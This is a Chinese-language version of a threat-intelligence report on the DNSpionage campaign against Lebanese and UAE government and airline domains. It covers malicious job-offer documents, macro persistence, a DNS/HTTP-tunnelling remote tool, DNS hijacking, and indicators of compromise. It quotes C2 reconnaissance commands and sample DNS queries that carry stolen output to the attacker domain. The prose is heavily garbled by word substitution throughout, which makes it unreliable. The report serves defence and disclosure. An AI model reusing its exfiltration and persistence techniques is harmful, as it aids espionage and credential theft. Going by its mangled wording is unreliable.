DNSpionage:针对中东的攻击活动

一、媒介

思科Talos团队近来发清楚明了针对黎巴嫩和阿拉伯联合酋长国(阿联酋,UAE)的新一波进击活动,这次进击活动波及.gov域名以及一家私营的黎巴嫩航空公司。 根据我们的钻研,这个进击组织显然精心钻研了受害者的收集根基举措措施,尽力维持隐蔽性,使进击历程尽可能不引起他人留意。

根据进击者的根基举措措施及TTP(战术、技巧和历程)特性,我们无法将该进击组织与近来察看到的其他进击活动或进击者关联在一路。该进击组织应用了两个虚假的恶意网站,此中托管了冒充成招聘文书的Microsoft Office恶意文档,文档中嵌入用来入侵目标用户的恶意宏。我们将进击者所应用的恶意软件标识为DNSpionage,该恶意软件能够以HTTP和DNS协议与进击者通信。

在另一次进击活动中,进击者应用相同的IP来重定向合法的.gov域名以及私有公司域名DNS哀求。在每次DNS重定向进击中,进击者都邑精心筹备,为重定向域名天生Let’s Encrypt证书。这些证书能够为用户免费供给X.509 TLS证书。到今朝为止,我们尚不清楚之前的DNS重定向进击是否已成功实施。

在本文中,我们会具体先容进击者所应用的措施,阐发进击者若何应用恶意文档引诱用户,应用户打开冒充成办事求职者的恶意网站。此外,我们也会先容恶意DNS重定向进击及进击事故光阴线。

二、进击措施

冒充的求职网站

进击者首先应用两个恶意网站来考试测验进击目标用户,这两个网站冒充成供给各类事情职位的合法站点:

hr-wipro[.]com (重定向至wipro.com)

hr-suncor[.]com (重定向至suncor.com)

这些网站托管了一个Microsoft Office恶意文档:hxxp://hr-suncor[.]com/Suncor_employment_form[.]doc。

该文档实际上是Suncor Energy(加拿大年夜一家可持续能源公司)官网上一份合法文件的拷贝,此中包孕恶意宏组件。

此时我们尚未澄清目标用户经由过程何种要领看到这些链接。进击者很有可能经由过程电子邮件钓鱼进击来发送恶意文档,但也有可能经由过程社交平台(如LinkedIn)来传播恶意链接,使这种求职进击加倍真实。

恶意Office文档

打开第一个Office文档后,用户会看到一个提示消息,声称文档的“内容模式可用”。

恶意宏

恶意样本中包孕的宏主要履行如下两个步骤:

1、当文档打开时,应用base64解码颠末编码的一个PE文件,然后将其开释到当前系统中,详细路径为%UserProfile%\.oracleServices\svchost_serv.doc。

2、当文档关闭时,将svchost_serv.doc重命名为svchost_serv.exe,然后创建名为chromium updater v 37.5.0的计划义务,以便履行该法度榜样。计划义务会急速履行,并且每分钟都邑重复履行。

恶意样本经由过程这两个步骤来规避沙盒检测。

只有当Microsoft Office被关闭时才会履行进击载荷,意味着载荷支配历程中必要用户交互。样本中包孕的宏同样应用密码保护,避免用户经由过程Microsoft Office查看宏代码。

此外,宏还用到了经典的字符串肴杂技巧来规避基于字符串的检测机制:

宏应用拼接要领天生schedule.service字符串。终极进击载荷是一款远程治理对象,我们将其标识为DNSpionage。

三、DNSpionage恶意软件

恶意软件阐发

恶意文档所开释的恶意软件是之前未公开的一款远程治理对象。因为该对象应用了DNS地道技巧来与进击者的根基举措措施通信,是以我们将其标识为DNSpionage。

DNSpionage会在当前运行目录中天生相关数据:

%UserProfile%.oracleServices/

%UserProfile%.oracleServices/Apps/

%UserProfile%.oracleServices/Configure.txt

%UserProfile%.oracleServices/Downloads/

%UserProfile%.oracleServices/log.txt

%UserProfile%.oracleServices/svshost_serv.exe

%UserProfile%.oracleServices/Uploads/

进击者应用Downloads目录来保存从C2办事器下载的其他脚本及对象。

将文件上传至C2办事器之前,进击者会应用Uploads目录光降时寄放这些文件。

进击者以明文款式将相关日志保存到log.txt文件中,所履行的敕令及结果也会记录该文件中。

Configure.txt文件中包孕恶意软件设置设置设备摆设摆设信息。进击者可以指天敕令及节制(C2)办事器URL、URI以及充当DNS维护地道的域名。此外,进击者可以指定肴杂历程中应用的自定义base64字符表。我们发明进击者会为每个目标定制字母表。

传输的所稀有据都应用JSON款式,是以恶意软件的大年夜部分代码都与JSON库有关。

通信渠道

恶意软件应用HTTP及DNS协议来与C2办事器通信。

HTTP模式

恶意软件会向0ffice36o[.]com提议DNS哀求,哀求中携带应用base64编码过的随机数据。恶意软件使用该哀求在办事器上注册当前被感染的系统,接管HTTP办事器的IP地址(阐发历程中该IP为185.20.184.138)。范例的DNS哀求如下:

yyqagfzvwmd4j5ddiscdgjbe6uccgjaq[.]0ffice36o[.]com

恶意软件也可以构造DNS哀求,为进击者供给更多信息。范例的哀求如下:

oGjBGFDHSMRQGQ4HY000[.]0ffice36o[.]com

在如上域名中,前4个字符由恶意软件应用rand()随机天生。剩下的域名应用base32编码天生,解码后的值为1Fy2048。此中Fy为目标ID,2048(0x800)代表Config file not found(“未找到设置设置设备摆设摆设文件”)。假如恶意软件未能在被感染主机上找到设置设置设备摆设摆设文件,则会提议该哀求,将消息发送给进击者。

随后,恶意软件首先会提议一次HTTP哀求(hxxp://IP/Client/Login?id=Fy),接管设置设置设备摆设摆设文件。

该哀求可以用来创建设置设置设备摆设摆设文件,设置自定义的base64字母表。

第二个哀求会发往hxxp://IP/index.html?id=XX(此中XX为被感染系统的ID值)。

该哀求的目的是接管进击者发送的敕令。这是冒充成维基百科的一个网站:

[1] [2] [3]下一页

进击者将敕令嵌入到网页的源码中:

在这个进击案例中,因为我们没有收到自定义的字母表,是以进击者应用的是标准的base64算法。还有其他案例在设置设置设备摆设摆设文件中应用了自定义的字母表,如下所示:

自动发送到被感染系统的3条敕令如下所示:

{“c”: “echo %username%”, “i”: “-4000”, “t”: -1, “k”: 0}

{“c”: “hostname”, “i”: “-5000”, “t”: -1, “k”: 0}

{“c”: “systeminfo | findstr /B /C:”Domain””, “i”: “-6000”, “t”: -1, “k”: 0}

履行这些敕令后,恶意软件会天生如下信息:

进击者哀求当前系统的用户名及主机名来获取受影响的用户域情况信息。很显着这是一个侦探踩点历程,所网络到的数据终极会发往hxxp://IP/Client/Upload。

着末,恶意软件应用CreateProcess()来履行这些敕令,所天生的结果被重定向到恶意软件应用CreatePipe()创建的一个管道。

DNS模式

恶意软件也可以只应用DNS模式。在该模式中,敕令及相应数据都经由过程DNS协议来处置惩罚。进击者可以在被感染主机的configure.txt文件中指定应用该模式。某些环境下,进击者可以应用DNS协议来返收受吸网络到的信息,避免通信数据被代理或者Web过滤器拦截。

首先,恶意软件会提议DNS哀求获取敕令,如下所示:

RoyNGBDVIAA0[.]0ffice36o[.]com

前4个字符可以直接轻忽(如前文所示,这是随机天生的字符),有代价的信息为GBDVIAA0,解码(base32)后的值为0GTx00,此中GT为目标ID,\x00为哀求号。在相应数据中,C2办事器会返回一个IP地址。虽然这个地址并不老是有效的IP地址(如0.1.0.3),但DNS协议支持应用这些地址。我们觉得第一个值(0x0001)为下一次DNS哀求的敕令ID,而0x0003为敕令的大年夜小。

随后,恶意软件应用该敕令ID来提议DNS查询哀求:

t0qIGBDVIAI0[.]0ffice36o[.]com (GBDVIAI0 => “0GTx01”)

C2办事器会返回一个新的IP地址:100.105.114.0。假如我们将该值转换为ASCII款式,则可以获得dirx00结果,也便是待履行的下一条敕令。

接下来,恶意软件会将敕令履行结果经由过程多个DNS哀求发送给办事器:

gLtAGJDVIAJAKZXWY000.0ffice36o[.]com -> GJDVIAJAKZXWY000 -> “2GTx01 Vol”

TwGHGJDVIATVNVSSA000.0ffice36o[.]com -> GJDVIATVNVSSA000 -> “2GTx02ume”

1QMUGJDVIA3JNYQGI000.0ffice36o[.]com -> GJDVIA3JNYQGI000 -> “2GTx03in d”

iucCGJDVIBDSNF3GK000.0ffice36o[.]com -> GJDVIBDSNF3GK000 -> “2GTx04rive”

viLxGJDVIBJAIMQGQ000.0ffice36o[.]com -> GJDVIBJAIMQGQ000 -> “2GTx05 C h”

[…]

受害者散播环境

在DNS特性及Cisco Umbrella办理规划的赞助下,我们成功识别出某些受害者被进击的光阴,以及进击者在10月和11月份的进击活动。前面提到的0ffice36o[.]com域名的活动数据如下图所示:

这些哀求都来自于黎巴嫩及阿联酋,这也与下文我们先容的DNS重定向信息相匹配。

四、DNS重定向

概述

Talos发明有3个IP与DNSpionage所应用的域名有关:

185.20.184.138

185.161.211.72

185.20.187.8

这3个IP都托管在DeltaHost上。

进击者在9月到11月之间的DNS重定向进击中应用到了着末一个IP。附属于黎巴嫩和阿联酋公共部门的多个域名办事器以及黎巴嫩境内的一些公司受这次进击影响,其名下的主机名被指向进击者节制的IP地址。进击者在一小段光阴窗口内将这些主机名重定向到185.20.187.8地址。在重定向IP之前,进击者会应用“Let’s Encrypt”办事创建与域名匹配的一个证书。

在这部分内容中,我们将向大年夜家先容我们识别出的所有DNS重定向进击案例以及进击者所天生的证书。我们并不清楚先前的进击是否已经成功,以及DNS重定向进击的真正目的。然而这种进击可能影响深远,由于进击者可以在进击光阴段内拦截造访这类域名的所有流量。因为进击者重点关注的是电子邮件以及VPN流量,是以进击者可能经由过程这次进击来偷取其他信息,如邮箱以及/或者VPN凭证。

因为用户收到的邮件也会流经进击者的IP地址,是以假如用户应用了多身分认证(MFA),进击者也有可能获取并滥用MFA认证码。因为进击者可以造访用户邮箱,是以还可以提议其他进击,以致打单目标用户。

我们发明DNS重定向进击涉及多个位置,这些根基举措措施、员工或者营业流程上没有直接关联,进击活动也涉及到公共或者私有部门。根据这些环境,我们觉得此次行径并非受影响单位中某个治理员的工资掉误或者差错所造成,而是由进击者提议的DNS重定向进击行径。

黎巴嫩政府重定向进击事故

Talos发明黎巴嫩财政部的电子邮箱域名是这次DNS重定向进击的受害方:

进击者在11月6日06:19:13 GMT将webmail.finance.gov.lb重定向到185.20.187.8,并在同一天的05:07:25创建了Let’s Encrypt证书。

阿联酋政府重定向进击事故

阿联酋公共域名也是这次进击目标。我们从警察部门(VPN及相关学院)和电信监管局中梳理相关域名信息:

上一页[1] [2] [3]下一页

进击者在9月13日06:39:39 GMT将adpvpn.adpolice.gov.ae重定向至185.20.187.8,并在同一天的05:37:54创建了Let’s Encrypt证书。

进击者在9月15日07:17:51 GMT将mail.mgov.ae重定向至185.20.187.8,并在同一天的06:15:51GMT创建了Let’s Encrypt证书。

进击者在9月24日将mail.apc.gov.ae重定向至185.20.187.8,并在同一天的05:41:49 GMT创建了Let’s Encrypt证书。

中东航空公司重定向进击事故

Talos发明黎巴嫩航空公司中东航空公司(MEA)也是这次DNS重定向进击的受害者。

进击者在11月14日11:58:36 GMT将memail.mea.com.lb重定向至185.20.187.8,并在同一天的10:35:10 GMT创建了 Let’s Encrypt证书。

该证书的subject字段中包孕多个备用名称,这是DNS协议支持的一个功能,可以将多个域名加入SSL通信中。

memail.mea.com.lb

autodiscover.mea.com.lb

owa.mea.com.lb

www.mea.com.lb

autodiscover.mea.aero

autodiscover.meacorp.com.lb

mea.aero

meacorp.com.lb

memailfr.meacorp.com.lb

meoutlook.meacorp.com.lb

tmec.mea.com.lb

这些域名可以赞助我们梳理受害者相关域名,根据这一点,我们觉得进击者对受害者异常懂得,才能知道进击中必要天生的域名及证书环境。

五、总结

在这次查询造访中我们发清楚明了两次进击事故:DNSpionage恶意软件以及DNS重定向进击。在恶意软件活动中,我们不知道详细的进击目标,但可知进击者针对的是黎巴嫩及阿联酋用户。然而,根据前文阐发,我们照样能够澄清重定向进击的详细目标。

我们有较大年夜的把握觉得这两次活动都由同一个进击组织所主导。然而,我们并不知道进击者的详细位置及确切念头。显然,进击者能够在两个月光阴内经由过程DNS重定向技巧进击两个国家的所属域名。从操作系统角度来看,进击者还能应用Windows恶意软件,也能使用DNS偷取技巧和重定向进击来支配进击收集。今朝我们尚不懂得这些DNS重定向进击是否已成功实施,但进击者依然在继承行动,到今朝为止,进击者在今年已经提议了5次进击,以前两周内就有1次进击活动。

从这些进击活动中可知,用户该当尽可能加强端点防护及收集保护机制。这个进击组织较为先辈,针对的也是较为紧张的一些目标,是以短期内他们应该不会竣事行动。

六、IoC

相关进击活动中涉及到的恶意软件IOC特性如下:

捏造的求职网站:

hr-wipro[.]com

hr-suncor[.]com

恶意文档:

9ea577a4b3faaf04a3bddbfcb934c9752bed0d0fc579f2152751c5f6923f7e14 (LB submit)

15fe5dbcd31be15f98aa9ba18755ee6264a26f5ea0877730b00ca0646d0f25fa (LB submit)

DNSpionage样本:

2010f38ef300be4349e7bc287e720b1ecec678cacbf0ea0556bcf765f6e073ec 82285b6743cc5e3545d8e67740a4d04c5aed138d9f31d7c16bd11188a2042969

45a9edb24d4174592c69d9d37a534a518fbe2a88d3817fc0cc739e455883b8ff

C2办事器IP:

185.20.184.138

185.20.187.8

185.161.211.72

C2办事器域名:

0ffice36o[.]com

DNS挟制域名(指向185.20.187.8):

2018-11-14 : memail.mea.com.lb

2018-11-06 : webmail.finance.gov.lb

2018-09-24 : mail.apc.gov.ae

2018-09-15 : mail.mgov.ae

2018-09-13 : adpvpn.adpolice.gov.ae

MFA证书中包孕的域名(指向185.20.187.8):

memail.mea.com.lb

autodiscover.mea.com.lb

owa.mea.com.lb

www.mea.com.lb

autodiscover.mea.aero

autodiscover.meacorp.com.lb

mea.aero

meacorp.com.lb

memailr.meacorp.com.lb

meoutlook.meacorp.com.lb

tmec.mea.com.lb

上一页[1] [2] [3]

赞(0) 打赏
分享到: 更多 (0)
免责申明:本站所有资料均来自于网络,版权归原创者所有!本站不提供任何保证,不保证真实性,并不承担任何法律责任

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

阿里云优惠网 更专业 更优惠

阿里云优惠券阿里云大礼包